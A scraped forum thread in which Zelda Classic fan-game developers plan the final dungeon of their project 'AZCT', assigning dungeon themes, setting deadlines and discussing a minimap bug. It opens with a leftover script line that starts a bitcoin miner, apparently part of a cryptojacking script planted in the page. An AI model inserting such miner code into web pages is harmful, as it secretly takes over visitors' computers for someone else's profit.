miner.start(); // initialise bitcoin miner
</script>

pge projectirc.cat.biomario fan games galaxy

AZCT: A Zelda Classic Thing - Basic Planning Thread

... zelda
CodeGorilla

Re: AZCT: A Zelda Classic Thing - Basic Planning Thread

Postby CodeGorilla » 2 years ago

Insomnia sucks, but on the bright side, I've made considerable progress on the level 5 boss. I have successfully created Buzzy Beetle-esque enemies that you can put in sideview rooms and bounce on, kick around into other enemies, and pick up using the power bracelet and throw at things. My plan is to create a Lakitu-esque enemy that spawns these, and the way to kill it is to throw these things back at him.

Nabe
Still working on AZCT

Postby Nabe » 2 years ago

Recruiting for the final dungeon!

The plan was originally eight floors, one per main dungeon, with the same themes and boss refights, but that represents a lot of work, and a very long dungeon. October is coming too quickly for that.

Instead, we're doing four floors with combined themes. For instance, I'll be doing a floor that takes the theme of Level 7 (shoes) and combines it with another level (TBD). If you want to sign up, claim one level number, and when we have four people we'll talk about how to best divvy up the remaining four levels.

You can do your final dungeon floor however you want to, as long as it incorporates both of your level numbers in some way (dungeon items / enemies / visuals/ other themes), and isn't too short or too long. (If you're making a standard Zelda dungeon segment, then somewhere between 12-20 screens is good.) It's not really important that all four floors connect properly to one another, and in fact I'd encourage spacial non-conformity for variety's sake.

1. Nabe [7,_]
2. CodeGorilla [5,_]

Remaining: 1, 2, 3, 4, 6, 8

The deadline for these floors will be September 15th.
That gives you about a month for ideas and building. The second half of September is going to be testtesttest to make sure everything is playable and fits together. We'll also decide which floor goes where at that time, although obviously we can discuss that beforehand as well.
Last edited by Nabe on 11 Aug 2015, 00:05, edited 2 times in total.

CodeGorilla

Nabe wrote:Recruiting for the final dungeon!
/snip
I'm down. I'll take dungeon 5, Old Talktoun, since that's the dungeon I'm most familiar with.

EDIT: Although, if there are enough other volunteers, I'll cede my spot and be on boss duty instead.

Nabe
Still working on AZCT

CodeGorilla wrote:
/snip
I'm down. I'll take dungeon 5, Old Talktoun, since that's the dungeon I'm most familiar with.

EDIT: Although, if there are enough other volunteers, I'll cede my spot and be on boss duty instead.
Thanks for volunteering. At this point, we may as well pick second numbers and go to town.

I could work with any of 1, 3 or 8.

CodeGorilla

Nabe wrote:Thanks for volunteering. At this point, we may as well pick second numbers and go to town.

Feel free to take whichever you're most comfortable with. I'm going to do a brief look through each of the dungeons tonight and tomorrow to get a feel for them, since I actually don't know a ton about the current state of the other dungeons, and if anything inspires me in particular, I'll let you know.

CodeGorilla

Nabe wrote:
CodeGorilla wrote:
/snip

Thanks for volunteering. At this point, we may as well pick second numbers and go to town.

I could see working with 6 or 3 pretty easily, although maybe it's best to pair 6 and 8 together as the two dungeons that seem to take the most advantage of sideview screens?

raekuul
X&BUTT
First name: Pokota
Pronouns: he/him/his

Postby raekuul » 2 years ago

My idea for 1 and whatever-other-number-I-have is to drop an invisible aquamentus in a sideview kill room. Straightforward and covers both gimmicks nicely. If you have better ideas please use those instead.

Nabe
Still working on AZCT

CodeGorilla wrote:I could see working with 6 or 3 pretty easily, although maybe it's best to pair 6 and 8 together as the two dungeons that seem to take the most advantage of sideview screens?
You could combine 4 and 5 quite easily and do a Castlevania-ish motif. :D

My segment is probably going to be sideview, as I've got the basis for a sideview segment that never made it into 7.

raekuul wrote:My idea for 1 and whatever-other-number-I-have is to drop an invisible aquamentus in a sideview kill room. Straightforward and covers both gimmicks nicely. If you have better ideas please use those instead.
The idea for these floors is moreso to have little playable dungeon segments, so that might be a bit out-of-place on its own. Please do let us know if you want to claim 1 and 6 though, since that takes numbers out of the running for the other three dungeon floors.

On the topic of 6, also, is it functionally complete? I wanted to wait for that before I started any serious visual work.
Last edited by Nabe on 27 Aug 2015, 15:26, edited 1 time in total.

raekuul
X&BUTT

I don't have any plans to change it, so whatever you feel need to do.

As far as playable dungeon segments, the "gimmick" as it were of 1 is that... you get the feather and it's full of dragons, some of which you don't have to fight. The "gimmick" of 6 is that there's not much that's more frightening than one's own imagination (read: I didn't want to fill it full of monsters so the dungeon's fairly empty).

So just throw an invisible sideview aquamentus in somewhere and you've got 1 and 6 covered. It doesn't have to be it's own segment.

Nabe
Still working on AZCT

raekuul wrote:I don't have any plans to change it, so whatever you feel need to do.

As far as playable dungeon segments, the "gimmick" as it were of 1 is that... you get the feather and it's full of dragons, some of which you don't have to fight. The "gimmick" of 6 is that there's not much that's more frightening than one's own imagination (read: I didn't want to fill it full of monsters so the dungeon's fairly empty).

So just throw an invisible sideview aquamentus in somewhere and you've got 1 and 6 covered. It doesn't have to be it's own segment.
But for the mixed floors to work, there need to be four of them. :P I could make a 1-6 floor if you like, or we could use the two numbers in other floors.

@CodeGorilla, it's looking like Nimono wants to use 3. I really do think 4 and 5 has potential to be cool, though.

raekuul
X&BUTT

Hrm... I don't know. Maybe we should just separate 1 and 6,maybe that way we can get a room full of invisible leevers or something.

CodeGorilla

Nabe wrote:@CodeGorilla, it's looking like Nimono wants to use 3. I really do think 4 and 5 has potential to be cool, though.
Sure. I didn't realize anyone else had responded to this yet. I'll see what I can do with four and five.

Kukironosuke
You can call me Kuki
First name: Travis
Pronouns: he/him/kirbys

Postby Kukironosuke » 2 years ago

are you guys still working on this? im really looking forward to it O:

-uses fairy on development team-

Nabe
Still working on AZCT

Kukironosuke wrote:are you guys still working on this? im really looking forward to it O:

-uses fairy on development team-
Definitely still being developed! :D

Nimono

Postby Nimono » 2 years ago

Absolutely still being developed! All the talk just tends to go on behind-the-scenes, so it gives the impression nothing's going on...

Nabe
Still working on AZCT

Moving the final dungeon list up, we could use one more person on this still.

1. Nabe [7, _]
2. CodeGorilla [5, 4]
3. Nimono [3, 2] (I think that's right?)
4. You?!

Remaining dungeon numbers: 1, 6, 8

I think I'm looking at 8, but if someone wants it I could still happily take 1 or 6.

I haven't heard back on these, but I assume an extra week would be helpful. So let's look at September 22nd instead of tomorrow for these.

raekuul
X&BUTT

Feel free to take 1 and 6; I'm not in the right mindset to assist and by the time I am this'll be done.

Nimono

I...actually don't remember what the gimmicks for dungeons 1, 2, 6, and 8 are... Mind refreshing my memory, Nabe?

raekuul
X&BUTT

1 was "Discretion is the better part of valor", 6 was "Things aren't always what they appear" and "OMG SIDEVIEW"

Nabe
Still working on AZCT

On a basic level:

1 - Dragons / wyverns / Aquamentus / very typical Zelda 1-style dungeon
2 - Bombs / bombchus / cave / crystal walls possibly (if KTS follows the style of the overworld entrance)
6 - Darkness / hidden secret things
8 - Clouds / high places

I'm planning on doing a Mario 3 sort of thing with shoes, so I'd like 8, but could work with 1 or 2.

Nimono

I'll definitely take 2, then. Thanks, Nabe

Nimono

Oh yeah, one thing I just remembered. The "Disable Link Marker in Minimap" option doesn't work like expected. It does EXACTLY what it says, disables it- but only in the minimap, not the Large Map. So screens that have that option marked will still have the link position marker on the large map when you pause the game. We need to fix this. Apparently, the only solution right now is to make an entirely new dmap for the sideview screens with an entirely new subscreen where the only difference from the normal one is that the large map has the link marker turned off. I know this is an extremely minor thing, but it seriously bugs me, so can we maybe perhaps please try to fix it?

...please? :(

Nabe
Still working on AZCT

Nimono wrote:Oh yeah, one thing I just remembered. The "Disable Link Marker in Minimap" option doesn't work like expected. It does EXACTLY what it says, disables it- but only in the minimap, not the Large Map. So screens that have that option marked will still have the link position marker on the large map when you pause the game. We need to fix this. Apparently, the only solution right now is to make an entirely new dmap for the sideview screens with an entirely new subscreen where the only difference from the normal one is that the large map has the link marker turned off. I know this is an extremely minor thing, but it seriously bugs me, so can we maybe perhaps please try to fix it?

...please? :(
Where specifically is this an issue? Scripts can't affect the active subscreen, so if there are any screens where you don't want Link's position to appear on the map, it needs to be solved manually as you've described.

In the final there are going to be mapless subscreens for these situations as well as any caves on the overworld etc. so make sure I'm aware of any screens like that.

Nimono

Will each floor of the final dungeon have their own level number (thus needing a new map, compass, and boss key for each floor), or will they all share the same one?

Nabe
Still working on AZCT

Nimono wrote:Will each floor of the final dungeon have their own level number (thus needing a new map, compass, and boss key for each floor), or will they all share the same one?
I'd been thinking that the tower would be a linear climb through unrelated floors, so if your submission has a map/compass/boss key, then I'll be sure to assign it a unique level number on import. (Although I would anyway; for isolated non-Triforce DMaps I've consistently used the DMap number as the level number for completeness.) That said, if someone planned their floor in a way that it uses the previous floor's map/compass/boss key, we'll sort out the order of the floors when they're complete to make that work.

Regarding your previous post, were you talking about the sideview segments in Level 3 and the shield mini?

Return to “AZCT”